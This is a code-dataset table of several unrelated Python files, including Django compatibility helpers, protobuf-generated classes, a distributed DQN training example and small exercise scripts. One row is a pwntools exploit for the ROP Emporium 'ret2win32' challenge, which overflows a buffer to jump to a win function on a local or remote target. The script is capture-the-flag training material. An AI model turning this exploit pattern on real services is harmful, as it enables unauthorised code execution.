blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 288 | content_id stringlengths 40 40 | detected_licenses listlengths 0 112 | license_type stringclasses 2 values | repo_name stringlengths 5 115 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 684 values | visit_date timestamp[us]date 2015-08-06 10:31:46 2023-09-06 10:44:38 | revision_date timestamp[us]date 1970-01-01 02:38:32 2037-05-03 13:00:00 | committer_date timestamp[us]date 1970-01-01 02:38:32 2023-09-06 01:08:06 | github_id int64 4.92k 681M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 22 values | gha_event_created_at timestamp[us]date 2012-06-04 01:52:49 2023-09-14 21:59:50 ⌀ | gha_created_at timestamp[us]date 2008-05-22 07:58:19 2023-08-21 12:35:19 ⌀ | gha_language stringclasses 147 values | src_encoding stringclasses 25 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 128 12.7k | extension stringclasses 142 values | content stringlengths 128 8.19k | authors listlengths 1 1 | author_id stringlengths 1 132 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ba96bc54e21848c73345987d7adeeb6c34db2b6c | e7a87d9eca87d8be7b23b3a57c1d49f0ad6d20bc | /django_evolution/compat/apps.py | 4d3b0b6371ada68f0f9cff1a5f2c8ad5d844b0dc | [
"BSD-2-Clause"
] | permissive | beanbaginc/django-evolution | 19a775a223b61861f503925216fb236b822122c0 | 756eedeacc41f77111a557fc13dee559cb94f433 | refs/heads/master | 2023-06-22T07:25:32.401292 | 2022-11-10T03:23:50 | 2022-11-10T03:23:50 | 14,189,401 | 22 | 13 | null | 2015-01-07T01:15:08 | 2013-11-07T00:04:43 | Python | UTF-8 | Python | false | false | 6,122 | py | """Compatibility functions for the application registration.
This provides functions for app registration and lookup. These functions
translate to the various versions of Django that are supported.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
try:
# Django >= 1.7
from django.apps.config import AppConfig
from django.apps.registry import apps
cache = None
except ImportError:
# Django < 1.7
from django.db.models.loading import cache
apps = None
AppConfig = None
from django_evolution.compat.datastructures import OrderedDict
from django_evolution.compat.models import all_models
def get_app(app_label, emptyOK=False):
"""Return the app with the given label.
This returns the app from the app registry on Django >= 1.7, and from
the old-style cache on Django < 1.7.
app_label (str):
The label for the app containing the models.
emptyOK (bool, optional):
Impacts the return value if the app has no models in it.
Returns:
module:
The app module, if available.
If the app module is available, but the models module is not and
``emptyOK`` is set, this will return ``None``. Otherwise, if modules
are not available, this will raise
:py:exc:`~django.core.exceptions.ImproperlyConfigured`.
Raises:
django.core.exceptions.ImproperlyConfigured:
The app module was not found, or it was found but a models module
was not and ``emptyOK`` was ``False``.
"""
if apps:
# Django >= 1.7
try:
models_module = apps.get_app_config(app_label).models_module
except LookupError as e:
# Convert this to an ImproperlyConfigured.
raise ImproperlyConfigured(*e.args)
if models_module is None and not emptyOK:
# This is the exact error that Django 1.6 provided.
raise ImproperlyConfigured(
'App with label %s is missing a models.py module.'
% app_label)
return models_module
else:
# Django < 1.7
return cache.get_app(app_label, emptyOK)
def get_apps():
"""Return the list of all installed apps with models.
This returns the apps from the app registry on Django >= 1.7, and from
the old-style cache on Django < 1.7.
Returns:
list: A list of all the modules containing model classes.
"""
if apps:
# Django >= 1.7
return [
app.models_module
for app in apps.get_app_configs()
if app.models_module is not None
]
else:
# Django < 1.7
return cache.get_apps()
def is_app_registered(app):
"""Return whether the app registry is tracking a given app.
Args:
app (module):
The app to check for.
Returns:
bool:
``True`` if the app is tracked by the registry. ``False`` if not.
"""
if apps:
# Django >= 1.7
return apps.is_installed(app.__name__)
else:
# Django < 1.7
return app in cache.app_store
def register_app(app_label, app):
"""Register a new app in the registry.
This must be balanced with a :py:func:`unregister_app` call.
Args:
app_label (str):
The label of the app.
app (module):
The app module.
"""
if apps:
# Django >= 1.7
app_config = AppConfig(app.__name__, app)
app_config.label = app_label
app_config.models_module = app
apps.set_installed_apps(settings.INSTALLED_APPS + [app_config])
else:
# Django < 1.7
cache.app_store[app] = len(cache.app_store)
if hasattr(cache, 'app_labels'):
cache.app_labels[app_label] = app
def unregister_app(app_label):
"""Unregister an app in the registry.
This must be balanced with a :py:func:`register_app` call.
Args:
app_label (str):
The label of the app to register.
"""
if apps:
# Django >= 1.7
#
# We need to balance the ``set_installed_apps`` from
# :py:func:`register_app` here.
apps.unset_installed_apps()
all_models[app_label].clear()
clear_app_cache()
def register_app_models(app_label, model_infos, reset=False):
"""Register one or more models to a given app.
These will add onto the list of existing models.
Args:
app_label (str):
The label of the app to register the models on.
model_info (list);
A list of pairs of ``(model name, model class)`` to register.
reset (bool, optional):
If set, the old list will be overwritten with the new list.
"""
if app_label not in all_models:
# This isn't really needed for Django 1.7+ (which uses defaultdict
# with OrderedDict), but it's needed for earlier versions, so do it
# explicitly.
all_models[app_label] = OrderedDict()
model_dict = all_models[app_label]
if reset:
model_dict.clear()
for model_name, model in model_infos:
model_dict[model_name] = model
clear_app_cache()
def unregister_app_model(app_label, model_name):
"""Unregister a model with the given name from the given app.
Args:
app_label (str):
The label of the app containing a model.
model_name (str):
The name of the model to unregister.
"""
del all_models[app_label][model_name]
clear_app_cache()
def clear_app_cache():
"""Clear the Django app/models caches.
This cache is used in Django >= 1.2 to quickly return results when
fetching models. It needs to be cleared when modifying the model registry.
"""
if apps:
# Django >= 1.7
apps.clear_cache()
elif hasattr(cache, '_get_models_cache'):
# Django >= 1.2, < 1.7
cache._get_models_cache.clear()
__all__ = [
'apps',
'clear_app_cache',
'get_app',
'get_apps',
]
| [
"christian@beanbaginc.com"
] | christian@beanbaginc.com |
268f750797e1a7249652d7a0247d8f5253ffa2fb | 5ec06dab1409d790496ce082dacb321392b32fe9 | /clients/python/generated/test/test_org_apache_sling_caconfig_impl_configuration_resolver_impl_info.py | 6e1f1ee41c0859498fa2cb56c04756c1d3068ad7 | [
"Apache-2.0"
] | permissive | shinesolutions/swagger-aem-osgi | e9d2385f44bee70e5bbdc0d577e99a9f2525266f | c2f6e076971d2592c1cbd3f70695c679e807396b | refs/heads/master | 2022-10-29T13:07:40.422092 | 2021-04-09T07:46:03 | 2021-04-09T07:46:03 | 190,217,155 | 3 | 3 | Apache-2.0 | 2022-10-05T03:26:20 | 2019-06-04T14:23:28 | null | UTF-8 | Python | false | false | 1,345 | py | # coding: utf-8
"""
Adobe Experience Manager OSGI config (AEM) API
Swagger AEM OSGI is an OpenAPI specification for Adobe Experience Manager (AEM) OSGI Configurations API # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: opensource@shinesolutions.com
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import swaggeraemosgi
from swaggeraemosgi.models.org_apache_sling_caconfig_impl_configuration_resolver_impl_info import OrgApacheSlingCaconfigImplConfigurationResolverImplInfo # noqa: E501
from swaggeraemosgi.rest import ApiException
class TestOrgApacheSlingCaconfigImplConfigurationResolverImplInfo(unittest.TestCase):
"""OrgApacheSlingCaconfigImplConfigurationResolverImplInfo unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOrgApacheSlingCaconfigImplConfigurationResolverImplInfo(self):
"""Test OrgApacheSlingCaconfigImplConfigurationResolverImplInfo"""
# FIXME: construct object with mandatory attributes with example values
# model = swaggeraemosgi.models.org_apache_sling_caconfig_impl_configuration_resolver_impl_info.OrgApacheSlingCaconfigImplConfigurationResolverImplInfo() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"michael.bloch@shinesolutions.com"
] | michael.bloch@shinesolutions.com |
a1dc08be45495a4750667ad658b66fe840bd1528 | 1b19103c7781c31b4042e5404eea46fa90014a70 | /cenit_learnifier_api_1_1_0/models/config.py | 46db87206b9fdca0f2085e8f92dc0a166911f7e3 | [] | no_license | andhit-r/odoo-integrations | c209797d57320f9e49271967297d3a199bc82ff5 | dee7edc4e9cdcc92e2a8a3e9c34fac94921d32c0 | refs/heads/8.0 | 2021-01-12T05:52:26.101701 | 2016-12-22T03:06:52 | 2016-12-22T03:06:52 | 77,223,257 | 0 | 1 | null | 2016-12-23T12:11:08 | 2016-12-23T12:11:08 | null | UTF-8 | Python | false | false | 2,516 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010, 2014 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp import models, fields
_logger = logging.getLogger(__name__)
COLLECTION_NAME = "learnifier_api_1_1_0"
COLLECTION_VERSION = "0.1"
COLLECTION_PARAMS = {
# WITHOUT COLLECTION_PARAMS.
}
class CenitIntegrationSettings(models.TransientModel):
_name = "cenit.learnifier_api_1_1_0.settings"
_inherit = 'res.config.settings'
############################################################################
# Pull Parameters
############################################################################
# WITHOUT PULL PARAMETERS.
############################################################################
# Default Getters
############################################################################
# WITHOUT GETTERS.
############################################################################
# Default Setters
############################################################################
# WITHOUT SETTERS.
############################################################################
# Actions
############################################################################
def install(self, cr, uid, context=None):
installer = self.pool.get('cenit.collection.installer')
data = installer.get_collection_data(
cr, uid,
COLLECTION_NAME,
version = COLLECTION_VERSION,
context = context
)
installer.install_collection(cr, uid, {'name': COLLECTION_NAME})
| [
"sanchocuba@gmail.com"
] | sanchocuba@gmail.com |
27726be64a543a5d321945af0c9442e9b320c003 | 74d66269984cec1527dbfb5aa9772775e2198ad6 | /examples/framework_examples/dqn_apex.py | 42bdec84702b7a4b2522097834c9976c900b3c83 | [
"MIT"
] | permissive | Silas-Asamoah/machin | 34dfa0717ba266a70e7ae11d60bf0055f222b2b3 | af1b5d825e27a98deab7130eedbe1c2505dacf9d | refs/heads/master | 2023-01-28T21:17:42.690424 | 2020-12-05T09:18:36 | 2020-12-05T09:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,177 | py | from machin.frame.helpers.servers import model_server_helper
from machin.frame.algorithms import DQNApex
from machin.parallel.distributed import World
from machin.utils.logging import default_logger as logger
from torch.multiprocessing import spawn
from time import sleep
import gym
import torch as t
import torch.nn as nn
class QNet(nn.Module):
def __init__(self, state_dim, action_num):
super(QNet, self).__init__()
self.fc1 = nn.Linear(state_dim, 16)
self.fc2 = nn.Linear(16, 16)
self.fc3 = nn.Linear(16, action_num)
def forward(self, state):
a = t.relu(self.fc1(state))
a = t.relu(self.fc2(a))
return self.fc3(a)
def main(rank):
env = gym.make("CartPole-v0")
observe_dim = 4
action_num = 2
max_episodes = 2000
max_steps = 200
solved_reward = 190
solved_repeat = 5
# initlize distributed world first
world = World(world_size=4, rank=rank,
name=str(rank), rpc_timeout=20)
servers = model_server_helper(model_num=1)
apex_group = world.create_rpc_group("apex", ["0", "1", "2", "3"])
q_net = QNet(observe_dim, action_num)
q_net_t = QNet(observe_dim, action_num)
dqn_apex = DQNApex(q_net, q_net_t,
t.optim.Adam,
nn.MSELoss(reduction='sum'),
apex_group,
servers)
# synchronize all processes in the group, make sure
# distributed buffer has been created on all processes in apex_group
apex_group.barrier()
# manually control syncing to improve performance
dqn_apex.set_sync(False)
if rank in (0, 1):
# Process 0 and 1 are workers(samplers)
# begin training
episode, step, reward_fulfilled = 0, 0, 0
smoothed_total_reward = 0
while episode < max_episodes:
# sleep to wait for learners keep up
sleep(0.1)
episode += 1
total_reward = 0
terminal = False
step = 0
state = t.tensor(env.reset(), dtype=t.float32).view(1, observe_dim)
# manually pull the newest parameters
dqn_apex.manual_sync()
while not terminal and step <= max_steps:
step += 1
with t.no_grad():
old_state = state
# agent model inference
action = dqn_apex.act_discrete_with_noise(
{"state": old_state}
)
state, reward, terminal, _ = env.step(action.item())
state = t.tensor(state, dtype=t.float32)\
.view(1, observe_dim)
total_reward += reward
dqn_apex.store_transition({
"state": {"state": old_state},
"action": {"action": action},
"next_state": {"state": state},
"reward": reward,
"terminal": terminal or step == max_steps
})
smoothed_total_reward = (smoothed_total_reward * 0.9 +
total_reward * 0.1)
logger.info("Process {} Episode {} total reward={:.2f}"
.format(rank, episode, smoothed_total_reward))
if smoothed_total_reward > solved_reward:
reward_fulfilled += 1
if reward_fulfilled >= solved_repeat:
logger.info("Environment solved!")
# will cause torch RPC to complain
# since other processes may have not finished yet.
# just for demonstration.
exit(0)
else:
reward_fulfilled = 0
elif rank in (2, 3):
# wait for enough samples
while dqn_apex.replay_buffer.all_size() < 500:
sleep(0.1)
while True:
dqn_apex.update()
if __name__ == "__main__":
# spawn 4 sub processes
# Process 0 and 1 will be workers(samplers)
# Process 2 and 3 will be learners
spawn(main, nprocs=4)
| [
"hanhanmumuqq@163.com"
] | hanhanmumuqq@163.com |
bedae5fc6afce8230f9020cf03d6faa9d338190f | 3b11a2535689377b63717a9086d2075e0443a1f7 | /backend/home/migrations/0001_load_initial_data.py | 43b8b03911ca58c6189c200ef9cbc035c11a9c5a | [] | no_license | Maria7786/mute-dawn-31229 | 80aa3d6a3d56987edd092a5e23e494a94d2ec878 | 85c408914566443049d9b4ed90fd6bb95896bde2 | refs/heads/master | 2023-08-12T02:28:53.782642 | 2021-10-08T06:31:03 | 2021-10-08T06:31:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | from django.db import migrations
def create_site(apps, schema_editor):
Site = apps.get_model("sites", "Site")
custom_domain = "mute-dawn-31229.botics.co"
site_params = {
"name": "Mute Dawn",
}
if custom_domain:
site_params["domain"] = custom_domain
Site.objects.update_or_create(defaults=site_params, id=1)
class Migration(migrations.Migration):
dependencies = [
("sites", "0002_alter_domain_unique"),
]
operations = [
migrations.RunPython(create_site),
]
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
c1647c310f7856e0d4e48b1f44eae86b399b09a7 | 2cc6d07914e4b46f5a1f46c616fd0260f1edf646 | /docker-task/ret2win32/bin/ret2win32.py | af96e7d5608af8c208bc9361c997650863f979ce | [] | no_license | qingyiangran/rop_emporium | 17abc26f048fab749745f5e9655b0086993f14f2 | 98a16f274eabd245eb00ffc50d1fc2b6aa1947ee | refs/heads/master | 2022-09-30T19:21:53.710952 | 2020-06-08T06:24:11 | 2020-06-08T06:24:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,422 | py | #!/usr/bin/python
#coding=utf-8
#__author__:TaQini
from pwn import *
local_file = './ret2win32'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc # '../libc.so.6'
is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host, port)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
if is_local: gdb.attach(p,cmd)
ret2win = 0x804865f
# rop1
offset = 44
payload = 'A'*offset
payload += p64(ret2win)
# debug()
sl(payload)
p.interactive()
| [
"742954809@qq.com"
] | 742954809@qq.com |
d5abedab589ced124c3687f1c1bc19016d446727 | 45489e34d62e2b4a1f940e02a05d2d02fec22209 | /SpiderKingdom/urls.py | d787e02a160e3db9b868403d08c0d71526e13922 | [] | no_license | yin6516008/TS | 3dde76a9ef9682578441df8f1c72df236567902a | 9f83d7fcf4a2ee9d729892be2c02b2b09361aae2 | refs/heads/master | 2020-03-24T17:32:00.035079 | 2018-08-01T10:30:44 | 2018-08-01T10:30:44 | 142,862,101 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 747 | py | from django.conf.urls import url
from django.conf.urls import include
from SpiderKingdom import views
from rest_framework import routers
from SpiderKingdom import views
router = routers.DefaultRouter()
router.register(r'users', views.UserViewSet)
router.register(r'groups', views.GroupViewSet)
router.register(r'domains', views.DomainViewSet)
router.register(r'projects', views.ProjectViewSet)
router.register(r'status_codes', views.StatusCodeViewSet)
router.register(r'cdns', views.CDNViewSet)
router.register(r'nodes', views.NodeViewSet)
urlpatterns = [
# url(r'^api/domain', views.domain),
url(r'^api/', include(router.urls)),
url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework'))
] | [
"root@localhost.localdomain"
] | root@localhost.localdomain |
8fa3718facd97ec9c61d956e50fe22639699156e | c2c03e034513a766c7de8298be428fb3eab3ab7b | /chainerrl/NeverSay20/env/bin/f2py | 4ecd45b705ee1bd2aae9806f80f61bb6ef1b1145 | [] | no_license | hamko/sample | 434adeca12e11587edce8cad799162b84c7f5071 | 9b0624b99e3e551d6b72b632d3a7d1a38aac7a9f | refs/heads/master | 2021-01-17T02:51:25.174354 | 2018-10-23T02:40:04 | 2018-10-23T02:40:04 | 9,640,383 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 800 | #!/home/hamko/git/sample/chainerrl/TicTacToe/env/bin/python3
# See http://cens.ioc.ee/projects/f2py2e/
from __future__ import division, print_function
import os
import sys
for mode in ["g3-numpy", "2e-numeric", "2e-numarray", "2e-numpy"]:
try:
i = sys.argv.index("--" + mode)
del sys.argv[i]
break
except ValueError:
pass
os.environ["NO_SCIPY_IMPORT"] = "f2py"
if mode == "g3-numpy":
sys.stderr.write("G3 f2py support is not implemented, yet.\\n")
sys.exit(1)
elif mode == "2e-numeric":
from f2py2e import main
elif mode == "2e-numarray":
sys.argv.append("-DNUMARRAY")
from f2py2e import main
elif mode == "2e-numpy":
from numpy.f2py import main
else:
sys.stderr.write("Unknown mode: " + repr(mode) + "\\n")
sys.exit(1)
main()
| [
"wakataberyo@gmail.com"
] | wakataberyo@gmail.com | |
e53ad4103953f54232b6f350f6e9129a291a2e1c | 0a1f8957a798006deaa53d10d09f733fab1e6b05 | /bin/Python27/Lib/site-packages/omniORBpy-4.2.0/lib/python/omniORB/COS/CosTypedNotifyChannelAdmin__POA/__init__.py | 274eb1c95e96e81dcde9e097b1e0a4dcbd0ab9b1 | [
"LicenseRef-scancode-other-permissive"
] | permissive | metamorph-inc/meta-core | a89504ccb1ed2f97cc6e792ba52e3a6df349efef | bc7a05e04c7901f477fe553c59e478a837116d92 | refs/heads/master | 2023-03-07T02:52:57.262506 | 2023-03-01T18:49:49 | 2023-03-01T18:49:49 | 40,361,476 | 25 | 15 | NOASSERTION | 2023-01-13T16:54:30 | 2015-08-07T13:21:24 | Python | UTF-8 | Python | false | false | 301 | py | # DO NOT EDIT THIS FILE!
#
# Python module CosTypedNotifyChannelAdmin__POA generated by omniidl
import omniORB
omniORB.updateModule("CosTypedNotifyChannelAdmin__POA")
# ** 1. Stub files contributing to this module
import CosTypedNotifyChannelAdmin_idl
# ** 2. Sub-modules
# ** 3. End
| [
"kevin.m.smyth@gmail.com"
] | kevin.m.smyth@gmail.com |
099019d67635e8959d837c8791dbfe078e97ed65 | b41dbe2c3223e22f1fbd834fa1b74ec484702534 | /setup.py | aaa4eae972614b13522dcee31057104e77f1712b | [] | no_license | kwoolter/gpx_analysis | f12d30e5416f525d39f7109bceb2ad9f60bd06a9 | 2d809ace82d96b3fbcd2d3cd61ce1d142c3e6c0c | refs/heads/master | 2022-09-07T13:14:16.289614 | 2020-05-19T09:03:43 | 2020-05-19T09:03:43 | 264,803,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from setuptools import setup
setup(
name='gpx_analysis',
version='',
packages=['gpx_analysis'],
url='',
license='',
author='kwoolter',
author_email='',
description='',
install_requires = ['pandas', 'gpxpy']
)
| [
"keith.woolterton@gmail.com"
] | keith.woolterton@gmail.com |
88544e4dcca7e40ad343bee1ddd2615bc291628b | 4ede96380f20c65e014f7e5748789c81a4700115 | /complex/complex_pb2.py | ff516978458d5fdd60ba76304e68e746e4c84f0b | [] | no_license | DavidWalshe93/Python_Protobuf | 1724689fc4d24c51d2bf40cb5ac2655355ed9aae | 1af5ecf7ac9fd479b7e283d9cb5ef1c5dd54a94a | refs/heads/master | 2022-04-20T08:04:38.660161 | 2020-04-18T00:26:51 | 2020-04-18T00:26:51 | 256,630,826 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 4,187 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: complex.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='complex.proto',
package='example.complex',
syntax='proto3',
serialized_options=b'Z\tcomplexpb',
serialized_pb=b'\n\rcomplex.proto\x12\x0f\x65xample.complex\"y\n\x0e\x43omplexMessage\x12\x30\n\tone_dummy\x18\x02 \x01(\x0b\x32\x1d.example.complex.DummyMessage\x12\x35\n\x0emultiple_dummy\x18\x03 \x03(\x0b\x32\x1d.example.complex.DummyMessage\"(\n\x0c\x44ummyMessage\x12\n\n\x02id\x18\x01 \x01(\x05\x12\x0c\n\x04name\x18\x02 \x01(\tB\x0bZ\tcomplexpbb\x06proto3'
)
_COMPLEXMESSAGE = _descriptor.Descriptor(
name='ComplexMessage',
full_name='example.complex.ComplexMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='one_dummy', full_name='example.complex.ComplexMessage.one_dummy', index=0,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='multiple_dummy', full_name='example.complex.ComplexMessage.multiple_dummy', index=1,
number=3, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=155,
)
_DUMMYMESSAGE = _descriptor.Descriptor(
name='DummyMessage',
full_name='example.complex.DummyMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='example.complex.DummyMessage.id', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='example.complex.DummyMessage.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=157,
serialized_end=197,
)
_COMPLEXMESSAGE.fields_by_name['one_dummy'].message_type = _DUMMYMESSAGE
_COMPLEXMESSAGE.fields_by_name['multiple_dummy'].message_type = _DUMMYMESSAGE
DESCRIPTOR.message_types_by_name['ComplexMessage'] = _COMPLEXMESSAGE
DESCRIPTOR.message_types_by_name['DummyMessage'] = _DUMMYMESSAGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ComplexMessage = _reflection.GeneratedProtocolMessageType('ComplexMessage', (_message.Message,), {
'DESCRIPTOR' : _COMPLEXMESSAGE,
'__module__' : 'complex_pb2'
# @@protoc_insertion_point(class_scope:example.complex.ComplexMessage)
})
_sym_db.RegisterMessage(ComplexMessage)
DummyMessage = _reflection.GeneratedProtocolMessageType('DummyMessage', (_message.Message,), {
'DESCRIPTOR' : _DUMMYMESSAGE,
'__module__' : 'complex_pb2'
# @@protoc_insertion_point(class_scope:example.complex.DummyMessage)
})
_sym_db.RegisterMessage(DummyMessage)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"david.walshe93@gmail.com"
] | david.walshe93@gmail.com |
f8b82507e3b52ddf92cdc39752e6e581f4a584b7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03036/s201107725.py | 1af652533bcb364e1fcefd93bc68c188b9e1c8a1 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | def mass(r, D, x):
return r*x - D
r, D, x = map(int, input().split())
for _ in range(10):
x = mass(r, D, x)
print(x) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
63bc0d71d7cde2d387dd3fb81c3b8f9c797a1e07 | fac51719e067ee2a70934e3bffdc98802d6dbb35 | /src/stronghold/rosalind_fibd.py | ebae89a00d6c3c43b933588319bfb333d3363c14 | [
"MIT"
] | permissive | cowboysmall-comp/rosalind | 37730abdd03e86a2106ef39b39cdbae908f29e6e | 021e4392a8fc946b97bbf86bbb8227b28bb5e462 | refs/heads/master | 2022-03-05T14:30:21.020376 | 2019-11-20T02:03:09 | 2019-11-20T02:03:09 | 29,898,979 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), '../tools'))
import files
import combinatorics
def main(argv):
n, m = files.read_line_of_ints(argv[0])
print combinatorics.fibonacci_with_mortality(n, m)
if __name__ == "__main__":
main(sys.argv[1:])
| [
"jerry@cowboysmall.com"
] | jerry@cowboysmall.com |
cb8b62f68af536bf53106f52a181962b4a62d27e | f76e11d4da15768bf8683380b1b1312f04060f9a | /lex_dep_conll_randomly.py | 91cf5c46bb79db6faaa0d519b070f648911847b0 | [] | no_license | rasoolims/scripts | 0804a2e5f7f405846cb659f9f8199f6bd93c4af6 | fd8110558fff1bb5a7527ff854eeea87b0b3c597 | refs/heads/master | 2021-07-07T03:53:20.507765 | 2021-04-13T14:53:00 | 2021-04-13T14:53:00 | 24,770,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,807 | py | import os,sys,codecs,random
from mst_dep_tree_loader import DependencyTree
from collections import defaultdict
from random import randint
def read_grams(file_path):
reader = codecs.open(file_path,'r')
bigrams = defaultdict(list)
trigrams = defaultdict(list)
unigrams = defaultdict(list)
line = reader.readline()
while line:
spl = line.strip().split('\t')
if spl[0]=='bigram':
bigrams[spl[1]].append(spl[2])
elif spl[0] == 'trigram':
trigrams[spl[1]].append(spl[2])
elif spl[0] == 'unigram':
unigrams[spl[1]].append(spl[2])
line = reader.readline()
print len(bigrams)
print len(trigrams)
return [bigrams,trigrams,unigrams]
trees = DependencyTree.load_trees_from_conll_file(os.path.abspath(sys.argv[1]))
x_pair = read_grams(os.path.abspath(sys.argv[2]))
bigrams = x_pair[0]
trigrams = x_pair[1]
unigrams = x_pair[2]
writer = codecs.open(os.path.abspath(sys.argv[3]),'w')
for tree in trees:
t = ['<s>','<s>']+list(tree.tags)+['</s>','</s>']
b = 0 # random.randint(0,1)
lex_set = set()
for i in range(0,1):
r = random.randint(2,len(t)-3)
dep_context = ' '.join(t[r-1:r+4])
head = tree.heads[r-2]
if head>0:
#print head, len(t)
head_context = ' '.join(t[head-1:head+4])
#print t
#print head
#print head_context
if unigrams.has_key(head_context) and unigrams.has_key(dep_context):
head_cand = random.randint(0,len(unigrams[head_context])-1)
head_word = unigrams[head_context][head_cand]
dep_cand= random.randint(0,len(unigrams[dep_context])-1)
dep_word = unigrams[dep_context][dep_cand]
tree.words[r-2] = dep_word
tree.words[head-1] = head_word
#else:
#print '--> found',head_context,'=======',dep_context
else:
print 'not found',head_context,'=======',dep_context
writer.write(tree.conll_str()+'\n\n') | [
"rasooli.ms@gmail.com"
] | rasooli.ms@gmail.com |
f3a17057535a5470347aec5d7e9082c1fba794a3 | 1f1e8b335470065b67cce28338cfb4a6da503c95 | /0x03-python-data_structures/9-max_integer.py | 1036fa892e7ca0e930e4e0fb28fac2535bc40339 | [] | no_license | guxal/holbertonschool-higher_level_programming | 48353071e719a509e10f3067f0c3f88cb44bd27d | fffd287c510602dc45e36df486f60cdfa1205335 | refs/heads/master | 2020-07-22T23:40:03.266880 | 2020-02-14T02:42:11 | 2020-02-14T02:42:11 | 207,370,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
def max_integer(my_list=[]):
if len(my_list) is 0:
return (None)
_max = my_list[0]
for i in my_list[:]:
if (_max < i):
_max = i
return (_max)
| [
"jonathanacp93@gmail.com"
] | jonathanacp93@gmail.com |
